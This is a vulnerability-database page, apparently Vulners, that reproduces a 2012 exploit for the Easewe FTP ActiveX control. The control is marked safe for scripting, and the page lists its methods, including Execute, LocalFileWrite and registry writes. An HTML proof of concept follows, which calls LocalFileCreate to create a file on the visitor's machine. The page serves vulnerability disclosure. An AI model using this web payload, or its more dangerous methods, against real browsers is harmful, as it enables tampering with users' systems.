Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Easewe FTP (EaseWeFtp.ocx) Insecure Method

🗓️ 08 Aug 2012 00:00:00Reported by coolkavehType 
zdt
 zdt🔗 0day.today👁 16 Views

Easewe FTP Insecure Method Exploit Foun

Code
Exploit Title: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
Date: 2012-08-08
Author: coolkaveh
[email protected]
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.ftpocx.com/download.htm
Version: 4.6.02
Tested on: windows 7 
Awesome Hesam BOF
==========================================================================
Class FtpLibrary
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
Number of Interfaces: 1
Default Interface: _FtpLibrary
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Interface _FtpLibrary : IDispatch
Default Interface: True
Members : 161
	QueueAppend
	QueueRemove
	FormatSize
	FormatFileSize
	FormatTime
	SFDFileName
	SFDFilter
	SFDInitialDir
	SFDTitle
	ShowBrowseFolderDialog
	ShowSaveFileDialog
	ServerName
	Username
	Password
	Port
	RemotePort
	RemotePath
	LocalPath
	ReplaceIndex
	ReplaceSetting
	RenameRule
	Percent
	MKDInfo
	MaxSpeed
	Rcvbuf
	Sndbuf
	Timeout
	RedoTimes
	AllowType
	DenyType
	MaxSize
	Title
	Encoding
	TranstatePath
	KeepAliveCommand
	KeepAliveInterval
	ListCommand
	ListSuffix
	LangInfo
	Info
	SInfo
	Lype
	ExistFile
	GetFileSize
	GetFtpFileSize
	GetFileInfo
	GetFtpFileInfo
	GetFileList
	GetFtpDirectoryInfo
	ExistDirectory
	CreateDirectory
	RemoveDirectory
	DeleteFile
	RenameFile
	SendCommand
	SetCurrentDirectory
	GetFileName
	GetFileNameWithoutExt
	GetFileExtension
	GetParentPath
	LocalFileExists
	LocalFolderExists
	LocalFileCreate
	LocalFolderCreate
	LocalFileDelete
	LocalFileRead
	LocalFileWrite
	GetLocalFileSize
	GetLocalFolderSize
	GetLocalFileCount
	GetLocalFileDate
	GetLocalFileList
	ShowCmd
	Execute
	Explore
	GetDriveNames
	ProxyHost
	ProxyPort
	RegCreate
	RegSetValue
	RegSetValueEx
	RegDelete
	RegDeleteValue
	RegDeleteValueEx
	RegGetValue
	RegGetValueEx
	RegExists
============================================================================
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>
 
<SCRIPT>
 
function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }
 
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Aug 2012 00:00Current
7High risk
Vulners AI Score7
easewe ftpinsecure methodlocalfilecreatecoolkaveh31ae647dvulnerability
16